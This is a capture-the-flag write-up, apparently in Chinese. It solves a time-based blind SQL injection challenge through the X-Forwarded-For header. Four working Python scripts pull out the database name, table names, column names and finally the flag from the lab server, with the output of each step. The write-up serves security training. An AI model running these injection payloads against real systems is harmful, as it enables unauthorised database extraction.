知识点
时间盲注（注入点为 X-Forwarded-For 请求头：猜测的字符匹配时服务端执行 sleep(8)，客户端以 7 秒读取超时判定命中）
解题步骤
爆出当前使用的数据库名:
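#-*-coding:utf-8-*-
"""Time-based blind SQL injection, step 1: recover the current database name.

The injection point is the ``X-Forwarded-For`` request header.  Each probe
asks the server to ``sleep(8)`` when one character of the target value equals
the guess; the client reads with a 7 second timeout, so a *read* timeout is
interpreted as "match".  Only ``ReadTimeout`` is treated as a hit: the
original used a bare ``except:``, so a connection error or DNS failure would
have been recorded as a found character.
"""
import string

URL = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidates tried at each position, in this order; the first hit wins.
# NOTE(review): the set includes the quote and backslash characters, which
# break the injected SQL instead of comparing — harmless for this target.
GUESS = (
    string.ascii_lowercase
    + string.ascii_uppercase
    + string.digits
    + string.punctuation
)
SLEEP_SECONDS = 8    # server-side delay on a hit ...
TIMEOUT_SECONDS = 7  # ... must exceed the client read timeout
MAX_LENGTH = 99      # the original scanned positions 1..99

# Placeholders: 1-based character position, candidate character, sleep seconds.
PAYLOAD = (
    "127.0.0.1'+(select case when (substring((select schema_name from "
    "information_schema.SCHEMATA where schema_name = database()) "
    "from %d for 1)='%s') then sleep(%d) else 1 end) and '1'='1"
)


def build_payload(pos: int, ch: str) -> str:
    """Return the X-Forwarded-For value that probes whether character *pos*
    (1-based) of the current database name equals *ch*."""
    return PAYLOAD % (pos, ch, SLEEP_SECONDS)


def char_matches(pos: int, ch: str) -> bool:
    """Send one probe; True when the server stalled past the read timeout."""
    import requests  # local import keeps the pure helpers importable without it

    headers = {"X-Forwarded-For": build_payload(pos, ch)}
    print(headers)
    try:
        requests.get(URL, headers=headers, timeout=TIMEOUT_SECONDS)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def extract(oracle, label: str, charset: str = GUESS,
            max_length: int = MAX_LENGTH) -> str:
    """Recover a string one character at a time.

    oracle(pos, ch) -> bool answers "is character *pos* equal to *ch*?".
    Stops at the first position where no candidate matches, or after
    *max_length* characters.  Prints *label* and the partial value after
    every hit, as the original script did.
    """
    found = []
    for pos in range(1, max_length + 1):
        hit = next((ch for ch in charset if oracle(pos, ch)), None)
        if hit is None:
            break
        found.append(hit)
        print(label, "".join(found))
    return "".join(found)


def main() -> None:
    """Run the extraction against the target and print the database name."""
    print("start.")
    database_name = extract(char_matches, "database.")
    print(database_name)


if __name__ == "__main__":
    main()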
运行结果:
web4
爆出web4中的表名:
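#-*-coding:utf-8-*-
"""Time-based blind SQL injection, step 2: list the tables of schema ``web4``.

Same oracle as step 1 (``X-Forwarded-For`` header, ``sleep(8)`` on a hit,
7 second client read timeout).  The table names come back as one
``@``-separated string built by ``group_concat``.  Only ``ReadTimeout``
counts as a hit; the original's bare ``except:`` would also have recorded a
connection failure as a found character.
"""
import string

URL = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
SCHEMA = "web4"  # recovered in step 1
# Candidates tried at each position, in this order; the first hit wins.
GUESS = (
    string.ascii_lowercase
    + string.digits
    + string.punctuation
    + string.ascii_uppercase
)
SLEEP_SECONDS = 8    # server-side delay on a hit ...
TIMEOUT_SECONDS = 7  # ... must exceed the client read timeout
MAX_LENGTH = 99      # the original scanned positions 1..99

# Placeholders: schema, 1-based character position, candidate, sleep seconds.
PAYLOAD = (
    "127.0.0.1'+(select case when (substring((select group_concat(table_name "
    "separator '@') from information_schema.tables where table_schema = '%s') "
    "from %d for 1)='%s') then sleep(%d) else 1 end) and '1'='1"
)


def build_payload(pos: int, ch: str) -> str:
    """Return the X-Forwarded-For value that probes whether character *pos*
    (1-based) of the concatenated table list equals *ch*."""
    return PAYLOAD % (SCHEMA, pos, ch, SLEEP_SECONDS)


def char_matches(pos: int, ch: str) -> bool:
    """Send one probe; True when the server stalled past the read timeout."""
    import requests  # local import keeps the pure helpers importable without it

    headers = {"X-Forwarded-For": build_payload(pos, ch)}
    print(headers)
    try:
        requests.get(URL, headers=headers, timeout=TIMEOUT_SECONDS)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def extract(oracle, label: str, charset: str = GUESS,
            max_length: int = MAX_LENGTH) -> str:
    """Recover a string one character at a time.

    oracle(pos, ch) -> bool answers "is character *pos* equal to *ch*?".
    Stops at the first position where no candidate matches, or after
    *max_length* characters.  Prints *label* and the partial value after
    every hit, as the original script did.
    """
    found = []
    for pos in range(1, max_length + 1):
        hit = next((ch for ch in charset if oracle(pos, ch)), None)
        if hit is None:
            break
        found.append(hit)
        print(label, "".join(found))
    return "".join(found)


def main() -> None:
    """Run the extraction against the target and print the table list."""
    print("start.")
    tables = extract(char_matches, "tables")
    print(tables)


if __name__ == "__main__":
    main()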
运行结果:
client_ip@flag
爆出flag表中的列名:
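#-*-coding:utf-8-*-
"""Time-based blind SQL injection, step 3: list the columns of table ``flag``.

Same oracle as the earlier steps (``X-Forwarded-For`` header, ``sleep(8)``
on a hit, 7 second client read timeout).  The column names come back as one
``@``-separated ``group_concat`` string.

Fix over the original: the lookup in ``information_schema.columns`` is now
restricted to ``table_schema = 'web4'``.  Filtering on ``table_name`` alone
would concatenate the columns of every table called ``flag`` in every
schema the user can see.  Only ``ReadTimeout`` counts as a hit; the bare
``except:`` of the original would also have recorded a connection failure.
"""
import string

URL = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
SCHEMA = "web4"  # recovered in step 1
TABLE = "flag"   # recovered in step 2
# Candidates tried at each position, in this order; the first hit wins.
GUESS = (
    string.ascii_lowercase
    + string.digits
    + string.punctuation
    + string.ascii_uppercase
)
SLEEP_SECONDS = 8    # server-side delay on a hit ...
TIMEOUT_SECONDS = 7  # ... must exceed the client read timeout
MAX_LENGTH = 99      # the original scanned positions 1..99

# Placeholders: schema, table, 1-based position, candidate, sleep seconds.
PAYLOAD = (
    "127.0.0.1'+(select case when (substring((select group_concat(column_name "
    "separator '@') from information_schema.columns where table_schema = '%s' "
    "and table_name = '%s') from %d for 1)='%s') then sleep(%d) else 1 end) "
    "and '1'='1"
)


def build_payload(pos: int, ch: str) -> str:
    """Return the X-Forwarded-For value that probes whether character *pos*
    (1-based) of the concatenated column list equals *ch*."""
    return PAYLOAD % (SCHEMA, TABLE, pos, ch, SLEEP_SECONDS)


def char_matches(pos: int, ch: str) -> bool:
    """Send one probe; True when the server stalled past the read timeout."""
    import requests  # local import keeps the pure helpers importable without it

    headers = {"X-Forwarded-For": build_payload(pos, ch)}
    print(headers)
    try:
        requests.get(URL, headers=headers, timeout=TIMEOUT_SECONDS)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def extract(oracle, label: str, charset: str = GUESS,
            max_length: int = MAX_LENGTH) -> str:
    """Recover a string one character at a time.

    oracle(pos, ch) -> bool answers "is character *pos* equal to *ch*?".
    Stops (printing ``finished.``) at the first position where no candidate
    matches, or silently after *max_length* characters.  Prints *label* and
    the partial value after every hit, as the original script did.
    """
    found = []
    for pos in range(1, max_length + 1):
        hit = next((ch for ch in charset if oracle(pos, ch)), None)
        if hit is None:
            print("finished.")
            break
        found.append(hit)
        print(label, "".join(found))
    return "".join(found)


def main() -> None:
    """Run the extraction against the target and print the column list."""
    print("start.")
    columns = extract(char_matches, "columns")
    print(columns)


if __name__ == "__main__":
    main()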
运行结果:
flag
爆出flag:
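#-*-coding:utf-8-*-
"""Time-based blind SQL injection, step 4: read ``flag.flag``.

Same oracle as the earlier steps (``X-Forwarded-For`` header, ``sleep(8)``
on a hit, 7 second client read timeout).  Only ``ReadTimeout`` counts as a
hit; the bare ``except:`` of the original would also have recorded a
connection failure as a found character.

NOTE(review): ``select flag from flag`` is used as a scalar subquery, so it
relies on the table holding exactly one row — the writeup's result shows
that held for this target; add ``limit 1`` if it does not elsewhere.
"""
import string

URL = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
TABLE = "flag"   # recovered in step 2
COLUMN = "flag"  # recovered in step 3
# Candidates tried at each position, in this order; the first hit wins.
GUESS = (
    string.ascii_lowercase
    + string.digits
    + string.punctuation
    + string.ascii_uppercase
)
SLEEP_SECONDS = 8    # server-side delay on a hit ...
TIMEOUT_SECONDS = 7  # ... must exceed the client read timeout
MAX_LENGTH = 99      # the original scanned positions 1..99

# Placeholders: column, table, 1-based position, candidate, sleep seconds.
PAYLOAD = (
    "127.0.0.1'+(select case when (substring((select %s from %s) "
    "from %d for 1)='%s') then sleep(%d) else 1 end) and '1'='1"
)


def build_payload(pos: int, ch: str) -> str:
    """Return the X-Forwarded-For value that probes whether character *pos*
    (1-based) of the flag value equals *ch*."""
    return PAYLOAD % (COLUMN, TABLE, pos, ch, SLEEP_SECONDS)


def char_matches(pos: int, ch: str) -> bool:
    """Send one probe; True when the server stalled past the read timeout."""
    import requests  # local import keeps the pure helpers importable without it

    headers = {"X-Forwarded-For": build_payload(pos, ch)}
    print(headers)
    try:
        requests.get(URL, headers=headers, timeout=TIMEOUT_SECONDS)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def extract(oracle, charset: str = GUESS, max_length: int = MAX_LENGTH) -> str:
    """Recover a string one character at a time.

    oracle(pos, ch) -> bool answers "is character *pos* equal to *ch*?".
    Stops (printing ``finished.``) at the first position where no candidate
    matches, or silently after *max_length* characters.  Prints the partial
    value after every hit, as the original script did.
    """
    found = []
    for pos in range(1, max_length + 1):
        hit = next((ch for ch in charset if oracle(pos, ch)), None)
        if hit is None:
            print("finished.")
            break
        found.append(hit)
        print("".join(found))
    return "".join(found)


def main() -> None:
    """Run the extraction against the target and print the recovered flag."""
    print("start.")
    flag_value = extract(char_matches)
    print(flag_value)


if __name__ == "__main__":
    main()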
运行结果:
cdbf14c9551d5be5612f7bb5d2867853
flag:
ctf{cdbf14c9551d5be5612f7bb5d2867853}